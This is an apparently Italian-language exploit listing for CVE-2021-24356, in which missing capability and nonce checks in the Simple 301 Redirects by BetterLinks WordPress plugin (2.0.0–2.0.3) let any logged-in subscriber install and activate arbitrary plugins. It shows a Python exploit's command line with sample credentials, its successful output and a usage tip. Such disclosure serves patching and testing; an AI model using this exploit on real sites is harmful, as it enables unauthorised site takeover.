
Simple 301 Redirects by BetterLinks - 2.0.0 – 2.0.3 - Iscritto + Installazione arbitraria di plugin
Simple 301 Redirects di BetterLinks - 2.0.0 – 2.0.3 - Sottoscrittore + Installazione arbitraria di plugin
La mancanza di controlli delle capacità e un controllo insufficiente del nonce sull'azione AJAX del plugin ha permesso a utenti autenticati di installare plugin arbitrari su siti vulnerabili.
$ python3 CVE-2021-24356.py --url http://wordpress.lan --username user --password useruser1 --slug betterlinks
Getting REST API Nonce!
Nonce Found: dd72f43027
Installing Plugin!
{"success":true,"data":"Plugin is installed successfully!"}
Activating Plugin!
{"success":true,"data":"BetterLinks is activated!"}
Nota: Alcuni plugin potrebbero non attivarsi; in tal caso è necessario modificare la variabile sluga con il percorso/file.php che è il file principale del plugin. Attualmente funziona molto bene quando lo slug è qualcosa come betterlinks e il file principale del plugin si chiama betterlinks.php.